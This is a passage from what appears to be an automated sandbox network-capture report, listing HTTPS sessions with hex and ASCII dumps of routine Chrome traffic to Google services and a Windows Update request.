30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 Data Ascii: 161?\".\"+a:\"\"):(b\u003db\|\|c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]\|\|null));return a\|\|null};\n_.ue\u003dfunction(a,b){_.Gb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.c
2024-11-11 00:14:05 UTC	1378	IN	Data Raw: 38 30 30 30 0d 0a 28 64 2c 5c 22 61 72 69 61 2d 5c 22 29 7c 7c 5f 2e 6f 65 28 64 2c 5c 22 64 61 74 61 2d 5c 22 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 3a 61 5b 64 5d 5c 75 30 30 33 64 63 7d 29 7d 3b 74 65 5c 75 30 30 33 64 7b 63 65 6c 6c 70 61 64 64 69 6e 67 3a 5c 22 63 65 6c 6c 50 61 64 64 69 6e 67 5c 22 2c 63 65 6c 6c 73 70 61 63 69 6e 67 3a 5c 22 63 65 6c 6c 53 70 61 63 69 6e 67 5c 22 2c 63 6f 6c 73 70 61 6e 3a 5c 22 63 6f 6c 53 70 61 6e 5c 22 2c 66 72 61 6d 65 62 6f 72 64 65 72 3a 5c 22 66 72 61 6d 65 42 6f 72 64 65 72 5c 22 2c 68 65 69 67 68 74 3a 5c 22 68 65 69 67 68 74 5c 22 2c 6d 61 78 6c 65 6e 67 74 68 3a 5c 22 6d 61 78 4c 65 6e 67 74 68 5c 22 2c 6e 6f 6e 63 65 3a 5c 22 6e 6f 6e 63 65 5c 22 2c 72 6f 6c 65 3a 5c 22 72 6f 6c Data Ascii: 8000(d,\"aria-\")\|\|_.oe(d,\"data-\")?a.setAttribute(d,c):a[d]\u003dc})};te\u003d{cellpadding:\"cellPadding\",cellspacing:\"cellSpacing\",colspan:\"colSpan\",frameborder:\"frameBorder\",height:\"height\",maxlength:\"maxLength\",nonce:\"nonce\",role:\"rol

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49737	172.217.16.196	443	7720	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:05 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-11 00:14:05 UTC	957	IN	HTTP/1.1 200 OK Version: 693618659 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Mon, 11 Nov 2024 00:14:05 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-11 00:14:05 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-11-11 00:14:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49745	172.217.18.14	443	7720	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:08 UTC	741	OUT	GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1 Host: apis.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-11 00:14:09 UTC	916	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access" Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]} Content-Length: 117949 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Fri, 08 Nov 2024 07:44:13 GMT Expires: Sat, 08 Nov 2025 07:44:13 GMT Cache-Control: public, max-age=31536000 Last-Modified: Thu, 10 Oct 2024 19:55:27 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Age: 232195 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-11 00:14:09 UTC	462	IN	Data Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 30 78 38 30 30 30 30 30 2c 20 5d 29 3b 0a 76 61 72 20 64 61 2c 65 61 2c 68 61 2c 6e 61 2c 6f 61 2c 73 61 2c 74 61 2c 77 61 3b 64 61 3d 66 75 6e Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x800000, ]);var da,ea,ha,na,oa,sa,ta,wa;da=fun
2024-11-11 00:14:09 UTC	1378	IN	Data Raw: 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 Data Ascii: ototype)return a;a[b]=c.value;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)ret
2024-11-11 00:14:09 UTC	1378	IN	Data Raw: 76 61 72 20 62 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 7b 6e 65 78 74 3a 64 61 28 61 29 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 62 60 22 2b 53 74 72 69 6e 67 28 61 29 29 3b 7d 3b 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 62 29 7d 3b 74 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 61 Data Ascii: var b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:da(a)};throw Error("b`"+String(a));};sa=function(a,b){return Object.prototype.hasOwnProperty.call(a,b)};ta=typeof Object.a
2024-11-11 00:14:09 UTC	1378	IN	Data Raw: 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 46 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 73 2e 4e 72 3d 5b 5d 3b 74 68 69 73 2e 68 56 3d 21 31 3b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 74 72 79 7b 68 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 63 61 74 63 68 28 6c 29 7b 6b 2e 72 65 6a 65 63 74 28 6c 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 46 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 6d 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6c 7c 7c 28 6c 3d 21 30 2c 6d 2e 63 61 6c 6c 28 6b 2c 6e 29 29 7d 7d 76 61 72 20 6b 3d 74 68 69 73 2c 6c 3d 21 31 3b 72 65 74 75 72 6e 7b 72 65 73 6f 6c 76 65 3a 68 28 74 68 69 73 2e 53 64 61 29 2c 72 65 6a 65 63 Data Ascii: =function(h){this.Fa=0;this.wf=void 0;this.Nr=[];this.hV=!1;var k=this.jF();try{h(k.resolve,k.reject)}catch(l){k.reject(l)}};e.prototype.jF=function(){function h(m){return function(n){l\|\|(l=!0,m.call(k,n))}}var k=this,l=!1;return{resolve:h(this.Sda),rejec
2024-11-11 00:14:09 UTC	1378	IN	Data Raw: 2e 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 47 37 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 4e 72 21 3d 6e 75 6c 6c 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 74 68 69 73 2e 4e 72 2e 6c 65 6e 67 74 68 3b 2b 2b 68 29 66 2e 58 4f 28 74 68 69 73 2e 4e 72 5b 68 5d 29 3b 0a 74 68 69 73 2e 4e 72 3d 6e 75 6c 6c 7d 7d 3b 76 61 72 20 66 3d 6e 65 77 20 62 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 79 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 68 2e 69 79 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 7a 66 61 3d 66 75 6e Data Ascii: .promise=this;h.reason=this.wf;return l(h)};e.prototype.G7=function(){if(this.Nr!=null){for(var h=0;h<this.Nr.length;++h)f.XO(this.Nr[h]);this.Nr=null}};var f=new b;e.prototype.yfa=function(h){var k=this.jF();h.iy(k.resolve,k.reject)};e.prototype.zfa=fun
2024-11-11 00:14:09 UTC	1378	IN	Data Raw: 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 73 57 69 74 68 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 45 61 28 74 68 69 73 2c 62 2c 22 73 74 61 72 74 73 57 69 74 68 22 29 2c 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 62 2e 6c 65 6e 67 74 68 3b 63 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 63 7c 30 2c 64 2e 6c 65 6e 67 74 68 29 29 3b 66 Data Ascii: ror("First argument to String.prototype."+c+" must not be a regular expression");return a+""};na("String.prototype.startsWith",function(a){return a?a:function(b,c){var d=Ea(this,b,"startsWith"),e=d.length,f=b.length;c=Math.max(0,Math.min(c\|0,d.length));f
2024-11-11 00:14:09 UTC	1378	IN	Data Raw: 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 47 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 72 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 22 29 3b 64 28 6c 29 3b 69 66 28 21 73 61 28 6c 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 66 60 22 2b 6c 29 3b 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3d 6d 3b 72 65 74 75 72 6e 20 Data Ascii: ar h=0,k=function(l){this.Ga=(h+=Math.random()+1).toString();if(l){l=_.ra(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Error("e");d(l);if(!sa(l,f))throw Error("f`"+l);l[f][this.Ga]=m;return
2024-11-11 00:14:09 UTC	1378	IN	Data Raw: 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 52 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 52 6b 3d 0a 6b 2e 5a 65 2e 52 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 52 6b 3d 66 28 29 3b 74 68 69 Data Ascii: te=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length\|\|delete this[0][k.id],k.Ze.Rk.next=k.Ze.next,k.Ze.next.Rk=k.Ze.Rk,k.Ze.head=null,this.size--,!0):!1};c.prototype.clear=function(){this[0]={};this[1]=this[1].Rk=f();thi
2024-11-11 00:14:09 UTC	1378	IN	Data Raw: 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 72 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78 74 28 29 3b 69 66 28 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 21 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 63 29 Data Ascii: ype.entries\|\|typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ra([c]));if(!d.has(c)\|\|d.size!=1\|\|d.add(c)!=d\|\|d.size!=1\|\|d.add({x:4})!=d\|\|d.size!=2)return!1;var e=d.entries(),f=e.next();if(f.done\|\|f.value[0]!=c\|\|f.value[1]!=c)
2024-11-11 00:14:09 UTC	1378	IN	Data Raw: 62 2b 39 32 31 36 7d 7d 7d 29 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 22 22 2c 64 3d 30 3b 64 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 76 61 72 20 65 3d 4e 75 6d 62 65 72 28 61 72 67 75 6d 65 6e 74 73 5b 64 5d 29 3b 69 66 28 65 3c 30 7c 7c 65 3e 31 31 31 34 31 31 31 7c 7c 65 21 3d 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 5f 63 6f 64 65 5f 70 6f 69 6e 74 20 22 2b 65 29 3b 65 3c 3d 36 35 35 33 35 3f 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 Data Ascii: b+9216}}});na("String.fromCodePoint",function(a){return a?a:function(b){for(var c="",d=0;d<arguments.length;d++){var e=Number(arguments[d]);if(e<0\|\|e>1114111\|\|e!==Math.floor(e))throw new RangeError("invalid_code_point "+e);e<=65535?c+=String.fromCharCode

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49748	142.250.186.110	443	7720	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:09 UTC	726	OUT	POST /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 913 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: / Origin: chrome-untrusted://new-tab-page X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-11 00:14:09 UTC	913	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 31 32 38 34 30 34 37 34 36 35 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1731284047465",null,null,null,
2024-11-11 00:14:10 UTC	936	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: chrome-untrusted://new-tab-page Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=519=zfmhaPXXFeIEW03rxrTUfkh9V7dIQd0LddxstnPOW8lfDp0WBYnAdmIquzmuRx72PrC-oU6XcF2X3ixoVUMqwA3msHDJM6z7LJY7byUpHuSmuznq6ife38Lzt4SuXeOnkbK0da3_XLwolx7It9NX-lKEQ2riZTk0vc1AuCKNIl1gab9PFw; expires=Tue, 13-May-2025 00:14:09 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Mon, 11 Nov 2024 00:14:09 GMT Server: Playlog Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Mon, 11 Nov 2024 00:14:09 GMT Connection: close Transfer-Encoding: chunked
2024-11-11 00:14:10 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-11-11 00:14:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49756	172.202.163.200	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:14 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=y+2aSXpCNotGH4M&MD=tMZ5WaH2 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-11 00:14:14 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: f7db265a-f027-4a0e-b657-63c26ce39ce1 MS-RequestId: f13cb84b-d29b-4020-b804-f908e6a0a077 MS-CV: f+/ZtIEia0ud1qAU.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Mon, 11 Nov 2024 00:14:14 GMT Connection: close Content-Length: 24490
2024-11-11 00:14:14 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
